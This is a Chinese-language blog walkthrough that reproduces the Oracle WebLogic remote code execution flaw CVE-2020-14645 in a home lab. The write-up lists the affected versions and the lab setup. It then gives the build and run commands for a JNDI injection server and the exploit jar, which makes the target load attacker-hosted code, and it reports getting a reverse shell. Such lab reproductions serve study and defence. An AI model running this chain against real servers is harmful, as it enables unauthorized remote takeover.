Weblogic远程代码执行漏洞(CVE-2020-14645)

简介

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

攻击者可利用漏洞实现远程代码执行。

 

影响版本

Oracle WebLogic Server 10.3.6.0.0

Oracle WebLogic Server 12.1.3.0.0

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0

 

复现环境

 

下载JDK 6u211/7u201/8u191任意版本并配置环境变量

本人用的jdk8(下载地址:https://mega.nz/file/1KIhjSCR#g0s5jekk3F9t55o3WXK_ahozuqn9_60eKSKt70we_uw)

WebLogic 12.2.1.4官方下载地址:

https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

安装

Weblogic远程代码执行漏洞(CVE-2020-14645)_第1张图片

 

 

一直下一步,勾选自助启动配置向导选项

Weblogic远程代码执行漏洞(CVE-2020-14645)_第2张图片

 

进入配置向导,创建新域并勾选全部模板;

 

 

Weblogic远程代码执行漏洞(CVE-2020-14645)_第3张图片

 

Weblogic远程代码执行漏洞(CVE-2020-14645)_第4张图片

 

Weblogic远程代码执行漏洞(CVE-2020-14645)_第5张图片

安装成功后,使用cd跳到base_domain目录下

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

运行startWebLogic.cmd

Weblogic远程代码执行漏洞(CVE-2020-14645)_第6张图片

 

浏览器访问http://IP:7001/console/login/LoginForm.jsp

Weblogic远程代码执行漏洞(CVE-2020-14645)_第7张图片

 

 

使用JNDI工具搭建LDAP和HTTP服务,注意不能占用8180/1099/1389三个端口,修改要执行的命令后回车,会同时启动LDAP/RMI/HTTP三种服务,并且自动编译好带命令的class文件

JNDI工具下载地址:

https://github.com/welk1n/JNDI-Injection-Exploit

下载完成后进入目录编译

cd JNDI-Injection-Exploit

mvn clean package -DskipTests

 

Weblogic远程代码执行漏洞(CVE-2020-14645)_第8张图片

Weblogic远程代码执行漏洞(CVE-2020-14645)_第9张图片

编译的时间比较久,需要多等会(我在进行编译的时候,花了很久时间,是Maven源没更换导致的)

 

编译完成后进入target,使用命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]

Weblogic远程代码执行漏洞(CVE-2020-14645)_第10张图片

 

然后使用CVE-2020-14645漏洞验证工具

下载地址:https://github.com/DSO-Lab/defvul(推荐使用镜像地址:https://github.com.cnpmjs.org/DSO-Lab/defvul)

进入CVE-2020-14645_Weblogic目录下进行编译

 

因为我kali中的jdk版本为11,该漏洞验证工具需要的jdk版本为1.8;于是我又屁颠屁颠在ubuntu上装java,装mvn;

开始编译:

Weblogic远程代码执行漏洞(CVE-2020-14645)_第11张图片

 

编译成功:

 

Weblogic远程代码执行漏洞(CVE-2020-14645)_第12张图片

然后进入target

java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#Exploit http://192.168.31.107:7001

 

成功反弹

 

Weblogic远程代码执行漏洞(CVE-2020-14645)_第13张图片

 

Weblogic远程代码执行漏洞(CVE-2020-14645)_第14张图片

你可能感兴趣的:(个人菜鸟笔记)